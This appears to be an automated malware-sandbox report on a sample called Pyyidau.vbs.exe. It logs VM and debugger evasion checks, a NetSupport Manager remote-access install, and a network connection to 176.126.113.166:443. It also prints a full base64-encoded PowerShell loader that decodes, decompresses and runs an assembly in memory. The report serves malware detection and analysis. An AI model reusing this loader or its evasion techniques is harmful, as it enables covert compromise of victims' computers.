                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001A0C40 _wcsrchr,FindFirstFileW,__wcsicoll,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,__wcsicoll,FindNextFileW,FindNextFileW,FindClose,32_2_001A0C40
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001B80C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,32_2_001B80C0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001B4AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,_wcsrchr,FindFirstFileW,FindClose,_wcsrchr,CopyFileW,32_2_001B4AF0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001B55D0 _memset,FindFirstFileW,FindClose,_wcsrchr,32_2_001B55D0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_0019FD80 FindFirstFileW,CompareFileTime,FindClose,_wcsrchr,__wcsicoll,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError,32_2_0019FD80
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_0019FE18 FindFirstFileW,CompareFileTime,FindClose,_wcsrchr,__wcsicoll,CreateDirectoryW,MoveFileW,32_2_0019FE18
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001BBE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW,32_2_001BBE60
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B1A860 _memset,GetVersionExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetSystemInfo,GetModuleHandleW,GetProcAddress,GetSystemMetrics,wsprintfW,28_2_00B1A860
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                                Source: client32.exe, 00000028.00000002.2758262575.0000000000FE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PhysicalMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual RAM00000001VMW-4096MBrErrorC
                                Source: client32.exe, 00000028.00000002.2765516150.0000000007980000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD00e
                                Source: client32.exe, 00000026.00000003.2700209803.0000000004E7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PhysicalMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual RAM00000001VMW-4096MBLMEM
                                Source: client32.exe, 0000002D.00000003.2809017512.0000000005A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD00
                                Source: client32.exe, 0000002D.00000003.2807838031.00000000089AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Manufacturer = "VMware Virtual RAM";
                                Source: wscript.exe, 00000000.00000003.1718268854.000001B89C254000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                Source: PCICL32.DLL.22.drBinary or memory string: vmwareVIRT%d adapters in chain, %d adapters by size
                                Source: client32.exe, 00000028.00000002.2758262575.0000000000FD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 00#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: client32.exe, 00000026.00000002.2709177904.00000000055A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\HyperV-Compute-Host-VirtualMachines-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1J9$
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 000000000002004C4F4F50%02X%02X%02X%02X%02X%02XVirtualVMwareVIRTNETGetAdapt`
                                Source: pcicfgui_client.exe, 00000024.00000002.2672742567.000000000098E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2701254562.0000000000903000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesHyper-VvirtualVMWarevirtBluetoothpfn..\ctl32\tcctlex.cppRtlIpv6AddressToStringWntdll.dllntohl%s%dNSNNSPChassisTypesSystemEnclosureWin32_SystemEnclosure
                                Source: client32.exe, 00000028.00000002.2758262575.0000000000F69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                                Source: client32.exe, 00000028.00000002.2758262575.0000000001045000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: PCICL32.DLL.22.drBinary or memory string: DoApplicationList type %d, found %d windows, max size %dWSAIoctlws2_32.dllGetAdaptersAddressesHyper-VVMWarevirt0000000000%02X%02X%02X%02X%02X%02XBluetoothpfn..\CTL32\tcctlex.cppRtlIpv6AddressToStringWntohl..\CTL32\tcputil.cpntohlpGetHostByNamegethostbynamepGetHostNamegethostnamepWSACleanuppWSAStartupWSOCK32.DLLSendARPSnmpExtensionQuerySnmpExtensionInitINETMIB1.DLLSnmpUtilVarBindFreeSnmpUtilOidNCmpSnmpUtilOidCpysnmpapi.dlll
                                Source: PCICL32.DLL.22.drBinary or memory string: vmware
                                Source: client32.exe, 00000028.00000002.2765780108.0000000007A96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD00B0
                                Source: client32.exe, 00000026.00000002.2709177904.00000000055A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD00c/
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpBinary or memory string: DoApplicationList type %d, found %d windows, max size %dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLGetAdaptersAddressesvirtualVMWarevirtpfntcctlex.cppRtlIpv6AddressToStringWntohlresultpGetAdaptersInfotcputil.cpntohlpGetHostByNamegethostbynamepGetHostNamegethostnamepWSACleanuppWSAStartupWSOCK32.DLLSnmpExtensionQuerySnmpExtensionInitINETMIB1.DLLSnmpUtilVarBindFreeSnmpUtilOidNCmpSnmpUtilOidCpysnmpapi.dll
                                Source: client32.exe, 00000026.00000002.2709177904.00000000055A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\HyperV-Feature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~~10.0.19041.2006
                                Source: client32.exe, 00000023.00000003.2652277705.0000000003184000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000023.00000003.2658395276.0000000003184000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWST_MUSIC_APP_DESCRIPTION}LMEM
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825322765.0000000004AD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMWare
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1831932926.00000000070B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825322765.0000000004AD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                                Source: client32.exe, 00000028.00000002.2758262575.0000000000FE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                                Source: client32.exe, 00000028.00000002.2762541707.00000000055EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PhysicalMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual RAM00000001VMW-4096MB
                                Source: client32.exe, 00000026.00000002.2703111799.000000000097B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "VMware Virtual RAM"
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 000000000002004C4F4F50%02X%02X%02X%02X%02X%02XVirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTH..\ctl32\macaddr.cpp%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll%02X%02X%02X%02X%02X%02Xmap/set<T> too longinvalid map/set<T> iterator,%02X
                                Source: client32.exe, 00000026.00000003.2700209803.0000000004E7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Manufacturer = "VMware Virtual RAM"
                                Source: C:\Windows\Installer\MSI264F.tmpAPI call chain: ExitProcess graph end nodegraph_28-55153
                                Source: C:\Windows\Installer\MSI2BE4.tmpAPI call chain: ExitProcess graph end node
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Windows\Installer\MSI3FCC.tmpAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information queried: ProcessInformationJump to behavior

                                Anti Debugging

                                barindex
                                Hides threads from debuggers
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeThread information set: HideFromDebugger
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeThread information set: HideFromDebugger
                                Tries to detect sandboxes and other dynamic analysis tools (window names)
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeOpen window title or class name: procmon_window_class
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeProcess queried: DebugPort
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeProcess queried: DebugPort
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess queried: DebugPort
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess queried: DebugPort
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess queried: DebugPort
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B382B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00B382B3
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B00130 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageW,TranslateMessage,DispatchMessageW,GetTickCount,GetMessageW,TranslateMessage,DispatchMessageW,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,wsprintfW,wsprintfW,wsprintfW,GetCurrentProcess,GetProcessTimes,GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,wsprintfW,GetCurrentThreadId,wsprintfW,GetCurrentProcess,GetGuiResources,wsprintfW,GetCurrentThreadId,wsprintfW,OutputDebugStringW,wsprintfW,wsprintfW,GetModuleFileNameW,wsprintfW,GetTempPathW,GetLocalTime,_memset,GetVersionExW,wsprintfW,_fputws,_fputws,_fputws,_fputws,_fputws,_fputws,wsprintfW,_fputws,_fputws,_fputws,_wcsncat,wsprintfW,SetTimer,MessageBoxW,KillTimer,PeekMessageW,MessageBoxW,28_2_00B00130
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B25490 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,FreeLibrary,28_2_00B25490
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B5C0DC __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,28_2_00B5C0DC
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess token adjusted: Debug
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B382B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00B382B3
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B3D4EC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00B3D4EC
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B2DDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,__wcsdup,LoadStringW,wsprintfW,__wcsicoll,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,_wcschr,_wcschr,28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004A82B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_004A82B3
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004AD4EC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_004AD4EC
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0049DDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,__wcsdup,LoadStringW,wsprintfW,__wcsicoll,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,_wcschr,_wcschr,30_2_0049DDD0
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EB34C3 SetUnhandledExceptionFilter,31_2_00EB34C3
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EA361B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_00EA361B
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EA7798 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00EA7798
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001BDDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,__wcsdup,LoadStringW,wsprintfW,__wcsicoll,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,_wcschr,_wcschr,GetCurrentDirectoryW,_wcsrchr,PostMessageW,KiUserCallbackDispatcher,_fputs,Sleep,32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001C82B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_001C82B3
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001CD4EC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_001CD4EC
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 176.126.113.166 443Jump to behavior
                                Contains functionality to automate explorer (e.g. start an application)
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B303E0 GetClassNameW,GetModuleHandleW,GetProcAddress,SHGetFolderPathW,LoadLibraryW,LoadLibraryW,GetModuleFileNameW,LoadLibraryW,GetProcAddress,GetWindowThreadProcessId,OpenProcess,CreateEventW,wsprintfW,CreateEventW,GetDesktopWindow,SendMessageW,Sleep,WaitForSingleObject,CreateEventW,IsWindow,GetClassNameW,IsWindowVisible,SetEvent,IsWindow,WaitForMultipleObjects,Sleep,WaitForSingleObject,IsWindow,WaitForSingleObject,FindWindowExW,GetWindowLongW,ShowWindow,ShowWindow,ShowWindow,WaitForSingleObject,WaitForSingleObject,ResetEvent,WaitForSingleObject,GetProcAddress,CloseHandle,GetDesktopWindow,GetWindowThreadProcessId,OpenProcess,OpenProcess,OpenProcess,GetPriorityClass,SetPriorityClass,GetDesktopWindow,SendMessageW,Sleep,SetPriorityClass,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,28_2_00B303E0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004A03E0 GetClassNameW,GetModuleHandleW,GetProcAddress,SHGetFolderPathW,LoadLibraryW,LoadLibraryW,GetModuleFileNameW,LoadLibraryW,GetProcAddress,GetWindowThreadProcessId,OpenProcess,CreateEventW,wsprintfW,CreateEventW,GetDesktopWindow,SendMessageW,Sleep,WaitForSingleObject,CreateEventW,IsWindow,GetClassNameW,IsWindowVisible,SetEvent,IsWindow,WaitForMultipleObjects,Sleep,WaitForSingleObject,IsWindow,WaitForSingleObject,FindWindowExW,GetWindowLongW,ShowWindow,ShowWindow,ShowWindow,WaitForSingleObject,WaitForSingleObject,ResetEvent,WaitForSingleObject,GetProcAddress,CloseHandle,GetDesktopWindow,GetWindowThreadProcessId,OpenProcess,OpenProcess,OpenProcess,GetPriorityClass,SetPriorityClass,GetDesktopWindow,SendMessageW,Sleep,SetPriorityClass,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,30_2_004A03E0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001C03E0 GetClassNameW,GetModuleHandleW,GetProcAddress,SHGetFolderPathW,LoadLibraryW,LoadLibraryW,GetModuleFileNameW,_wcsrchr,LoadLibraryW,GetProcAddress,GetWindowThreadProcessId,OpenProcess,CreateEventW,wsprintfW,CreateEventW,GetDesktopWindow,SendMessageW,Sleep,WaitForSingleObject,CreateEventW,IsWindow,GetClassNameW,IsWindowVisible,SetEvent,IsWindow,WaitForMultipleObjects,Sleep,WaitForSingleObject,IsWindow,WaitForSingleObject,FindWindowExW,GetWindowLongW,ShowWindow,ShowWindow,ShowWindow,WaitForSingleObject,WaitForSingleObject,ResetEvent,WaitForSingleObject,GetProcAddress,CloseHandle,GetDesktopWindow,GetWindowThreadProcessId,OpenProcess,OpenProcess,OpenProcess,GetPriorityClass,SetPriorityClass,GetDesktopWindow,SendMessageW,Sleep,SetPriorityClass,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,32_2_001C03E0
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Pyyidau.vbs.exe "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI2BE4.tmp "C:\Windows\Installer\MSI2BE4.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EUJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe"Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI3FCC.tmp "C:\Windows\Installer\MSI3FCC.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EV"NetSupport School" /EF".\Log Files" /EF".\Bookmarks" /EF".\Tests" /EF".\Store" /EF".\inv" /EF".\Resources" /EF".\Help" /EF".\Image" /EF".\Sound" /EF".\Video" /EA /EX /EC /Q /V /Q /I * Jump to behavior
